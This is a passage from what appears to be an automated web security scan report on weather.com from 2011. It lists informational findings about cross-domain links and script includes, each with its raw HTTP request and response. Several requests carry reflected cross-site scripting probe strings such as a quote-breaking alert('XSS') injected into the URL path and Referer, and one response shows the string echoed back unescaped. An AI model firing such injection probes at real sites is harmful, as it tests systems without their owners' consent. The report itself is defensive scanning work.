Picks <img width="29" height="13" src="http://s.imwx.com/v.20100719.135915/img/common/icon-new.png" alt="NEW"> </a>...[SNIP]... <a href="/outdoors/home-improvement/" from="nav_secondary" >Home Improvement <img width="29" height="13" src="http://s.imwx.com/v.20100719.135915/img/common/icon-new.png" alt="NEW"> </a>...[SNIP]... <a href="/services/ipad.html" from="nav_secondary">iPad App <img width="29" height="13" src="http://s.imwx.com/v.20100719.135915/img/common/icon-new.png" alt="NEW"> </a>...[SNIP]... <a href="/tv/programs/ywt.html" from="nav_spotlight">Exclusive Behind-the-Scenes View <img width="29" height="13" src="http://s.imwx.com/v.20100719.135915/img/common/icon-new.png" alt="NEW"> </a>...[SNIP]... <A href="http://www.weather.com/newscenter/nationalforecast/index.html"><IMG height=100 src="http://i.imwx.com/web/common/images/gfx_weathernews.jpg" width=100> </A>...[SNIP]... <A href="http://www.weather.com/activities/travel/vacationplanner/"><IMG height=100 src="http://i.imwx.com/web/common/images/gfx_travelplanner.jpg" width=100> </A>...[SNIP]... <A href="http://www.weather.com/tv/"><IMG height=100 src="http://i.imwx.com/web/common/images/gfx_ontv.jpg" width=100> </A>...[SNIP]... <dd><a href="http://www.theweatherchannelkids.com/" target="_blank"> TWC Kids</a></dd> <dd><a href="http://weatherbonk.com/" target="_blank"> WeatherBonk</a>...[SNIP]... <dd><a title="America's Event And Attraction Search Engine - Festivals, Arts And Crafts, Fairs And Many Other Local Events And Attractions" href="http://www.eventcrazy.com" target="_blank"> EventCrazy.com Events</a>...[SNIP]... <dd><a href="http://www.webmd.com/allergies/default.htm" target="_blank"> WebMD Asthma & Allergy Center</a>...[SNIP]... <dd><a href="http://www.godaddy.com/default.aspx?isc=gdweather2" target="_blank"> Web Hosting at GoDaddy.com</a>...[SNIP]... <dd><a href="http://www.forgetaway.com" target="_blank"> <br>...[SNIP]... <li><a target="_blank" href="http://twcmediakit.com/" from="footer"> Advertising</a>...[SNIP]... <li class="twc-last"><a href="http://www.controlyourtv.org/Intro.aspx" target="_blank" from="footer"> Parental Controls</a>...[SNIP]...
4.4. http://www.weather.com/pagelet/bc/56967
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/bc/56967
Issue detail
The page was loaded from a URL containing a query string:http://www.weather.com/pagelet/bc/56967? The response contains the following link to another domain:http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com %2FTheWeatherChannel&layout=button_count&show_faces=true&width=92&action=like&colorscheme=light&height=21
Request
GET /pagelet/bc/56967? HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/activities/driving/rushhour/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=3; fromStr=; s_pers=%20s_nr%3D1300988005201%7C1303580005201%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1300988007219; RMID=c245359a4d8b7f55
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Thu, 24 Mar 2011 17:33:43 GMT Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:37:54 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii1x02 X-Cache-Hits: 1 X-Varnish: 1156282709 1156204280 Connection: keep-alive Content-Length: 4162 <script> function PopupCenter(pageURL, title,w,h) { var left = (screen.width/2)-(w/2); var top = (screen.height/2)-(h/2); var targetWin = window.open (pageURL, title, 'toolbar=no,...[SNIP]... <li> <iframe class="twc-facebook-icon" src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com %2FTheWeatherChannel&layout=button_count&show_faces=true&width=92&action=like&colorscheme=light&height=21" scrolling="no" frameborder="0" ALLOWTRANSPARENCY="true"> </iframe>...[SNIP]...
4.5. http://www.weather.com/pagelet/bc/59233
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/bc/59233
Issue detail
The page was loaded from a URL containing a query string:http://www.weather.com/pagelet/bc/59233? The response contains the following link to another domain:http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com %2FTheWeatherChannel&layout=button_count&show_faces=true&width=92&action=like&colorscheme=light&height=21
Request
GET /pagelet/bc/59233? HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/services/desktop.html X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=; s_pers=%20s_nr%3D1300988115565%7C1303580115565%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; fsr.a=1300988116526
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Thu, 24 Mar 2011 17:37:47 GMT Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:41:47 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii2x01 X-Varnish: 2184649200 Connection: keep-alive Content-Length: 4179 <script> function PopupCenter(pageURL, title,w,h) { var left = (screen.width/2)-(w/2); var top = (screen.height/2)-(h/2); var targetWin = window.open (pageURL, title, 'toolbar=no,...[SNIP]... <li> <iframe class="twc-facebook-icon" src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com %2FTheWeatherChannel&layout=button_count&show_faces=true&width=92&action=like&colorscheme=light&height=21" scrolling="no" frameborder="0" ALLOWTRANSPARENCY="true"> </iframe>...[SNIP]...
4.6. http://www.weather.com/pagelet/bc/62264
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/bc/62264
Issue detail
The page was loaded from a URL containing a query string:http://www.weather.com/pagelet/bc/62264?locid=undefined The response contains the following link to another domain:http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com %2FTheWeatherChannel&layout=button_count&show_faces=true&width=92&action=like&colorscheme=light&height=21
Request
GET /pagelet/bc/62264?locid=undefined HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/weather/health/beauty/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fv=-1; fromStr=; s_pers=%20s_nr%3D1300988049502%7C1303580049502%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RMID=c245359a4d8b7f55; LocID=; fsr.a=1300988050037
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Thu, 24 Mar 2011 17:35:20 GMT Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:38:37 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii2x02 X-Varnish: 1096871981 Connection: keep-alive Content-Length: 4180 <script> function PopupCenter(pageURL, title,w,h) { var left = (screen.width/2)-(w/2); var top = (screen.height/2)-(h/2); var targetWin = window.open (pageUR...[SNIP]... <li> <iframe class="twc-facebook-icon" src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com %2FTheWeatherChannel&layout=button_count&show_faces=true&width=92&action=like&colorscheme=light&height=21" scrolling="no" frameborder="0" ALLOWTRANSPARENCY="true"> </iframe>...[SNIP]...
5. Cross-domain script include
previous
next
There are 10 instances of this issue:
5.1. http://www.weather.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://d.imwx.com/js/wx-a21-plugthis-2_0.js http://s.imwx.com/global/common/elements/javascript/a21-2_3.js http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js
Request
GET / HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Content-Language: en-US Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:28:40 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii3x01 X-Cache-Hits: 1 X-Varnish: 2366335366 2366335339 Date: Thu, 24 Mar 2011 17:28:17 GMT Connection: keep-alive Content-Length: 159636 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssVersion/?"><script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"> </script><script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"> </script>...[SNIP]...
5.2. http://www.weather.com/activities/driving/rushhour/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/activities/driving/rushhour/
Issue detail
The response dynamically includes the following scripts from other domains:http://j.imwx.com/v.20100826.0/common/header/javascript/wx-header-events.js http://j.imwx.com/v.20110214.1/common/a21/plugins/a21plugins.js http://s.imwx.com/js/2.8.0r4/yuiloader-dom-event/yuiloader-dom-event.js http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js http://s.imwx.com/v.20110214.1/global/common/elements/javascript/a21-2_3.js
Request
GET /activities/driving/rushhour/ HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300987999757%7C1303579999757%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/activities/driving/rushhour/%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Date: Thu, 24 Mar 2011 17:32:46 GMT Pragma: no-cache Content-Type: text/html; charset=iso-8859-1 Server: Apache SVRNAME: web1x10 VarnishSet: web X-Varnish: 1455522174 Vary: Accept-Encoding Content-Length: 96659 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML> <HEAD> <TITLE>Traffic reports for rush hour traffic conditions and delays from weather.com<...[SNIP]... <!-- DFP --><script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"> </script>...[SNIP]... </script><script type="text/javascript" src="http://s.imwx.com/v.20110214.1/global/common/elements/javascript/a21-2_3.js"> </script><script src="http://j.imwx.com/v.20110214.1/common/a21/plugins/a21plugins.js"> </script>...[SNIP]... </style><script type="text/javascript" src="http://s.imwx.com/js/2.8.0r4/yuiloader-dom-event/yuiloader-dom-event.js"> </script><script type="text/javascript" src="http://j.imwx.com/v.20100826.0/common/header/javascript/wx-header-events.js"> </script>...[SNIP]...
5.3. http://www.weather.com/common/a21/makeRequest-2_3.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/common/a21/makeRequest-2_3.html
Issue detail
The response dynamically includes the following script from another domain:http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js
Request
GET /common/a21/makeRequest-2_3.html?pos=WX_Top300Variable&key=1300987733362 HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fsr.a=1300987732569; fv=1; RMID=c245359a4d8b7f55
Response
HTTP/1.1 200 OK Date: Thu, 24 Mar 2011 17:28:20 GMT Pragma: no-cache Content-Type: text/html; charset=iso-8859-1 Server: Apache SVRNAME: web3x03 VarnishSet: web X-Varnish: 2587929389 Vary: Accept-Encoding Content-Length: 2503 <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=UTF-8"> <title>Make a request</title> <script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"> </script>...[SNIP]...
5.4. http://www.weather.com/mobile/swap/send_sms_to_phone.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/mobile/swap/send_sms_to_phone.html
Issue detail
The response dynamically includes the following scripts from other domains:http://j.imwx.com/v.20110214.1/common/a21/plugins/a21plugins.js http://js.revsci.net/gateway/gw.js?csid=K06578 http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js http://s.imwx.com/v.20110214.1/global/common/elements/javascript/a21-2_3.js
Request
GET /mobile/swap/send_sms_to_phone.html?from=hdr_locations HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/weather/health/beauty/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; fromStr=; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%25252523%252526ot%25253DA%3B; s_pers=%20s_nr%3D1300988109827%7C1303580109827%3B
Response
HTTP/1.1 200 OK Cache-Control: max-age=0 Date: Thu, 24 Mar 2011 17:37:26 GMT Pragma: no-cache Content-Type: text/html; charset=iso-8859-1 Accept-Ranges: bytes Server: Apache Vary: Accept-Encoding SVRNAME: web1x13 Expires: Thu, 24 Mar 2011 17:36:18 GMT Connection: keep-alive Content-Length: 34038 <HTML> <HEAD> <TITLE>Wireless Internet</title> <script language="JavaScript">var ts_pageid="59201";var ts_pagename="/mobile/swap/send_sms_to_phone.html";var ts_level1="MOBILE";var ts_level2="swap...[SNIP]... <!-- DFP --><script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"> </script>...[SNIP]... </script><script type="text/javascript" src="http://s.imwx.com/v.20110214.1/global/common/elements/javascript/a21-2_3.js"> </script><script src="http://j.imwx.com/v.20110214.1/common/a21/plugins/a21plugins.js"> </script>...[SNIP]... </script><script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=K06578" CHARSET="ISO-8859-1"> </script>...[SNIP]...
5.5. http://www.weather.com/pagelet/apps/traffic/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet/apps/traffic/
Issue detail
The response dynamically includes the following scripts from other domains:http://d.imwx.com/js/wx-a21-plugthis-2_0.js http://s.imwx.com/global/common/elements/javascript/a21-2_3.js http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js
Request
POST /pagelet/apps/traffic/?sub HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967? Origin: http://www.weather.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780 Content-Length: 0
Response
HTTP/1.1 400 Bad Request Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:45:00 GMT Server: Apache Vary: Accept-Encoding nnCoection: close SVRNAME: wxii1x04 X-Varnish: 1510914846 Date: Thu, 24 Mar 2011 17:40:00 GMT Connection: keep-alive Content-Length: 108234 <!DOCTYPE HTML> <html> <head> <title>Page Not Found</title> <link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">...[SNIP]... </style><script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"> </script><script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"> </script>...[SNIP]...
5.6. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico
Issue detail
The response dynamically includes the following scripts from other domains:http://d.imwx.com/js/wx-a21-plugthis-2_0.js http://s.imwx.com/global/common/elements/javascript/a21-2_3.js http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js
Request
GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico HTTP/1.1 Host: www.weather.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D
Response
HTTP/1.1 200 OK Cache-Control: max-age=30 Date: Thu, 24 Mar 2011 17:40:48 GMT Content-Type: text/html;charset=UTF-8 Expires: Thu, 24 Mar 2011 17:41:17 GMT Server: Apache Vary: Accept-Encoding SVRNAME: wxii2x07 X-Varnish: 2184720384 Connection: keep-alive Content-Length: 159902 <!DOCTYPE HTML> <html lang="en"> <head> <TITLE>National and Local W...[SNIP]... <link rel="stylesheet" type="text/css" href="/cssVersion/pagelet8cd82"-alert("XSS")-"370523ec97/bc/favicon2.ico?"><script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"> </script><script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"> </script>...[SNIP]...
5.7. http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.weather.com
Path:
/pagelet8cd82%22-alert(1)-%22370523ec97/bc/favicon2.ico
Issue detail
The response dynamically includes the following scripts from other domains:http://d.imwx.com/js/wx-a21-plugthis-2_0.js http://s.imwx.com/global/common/elements/javascript/a21-2_3.js http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js
Request
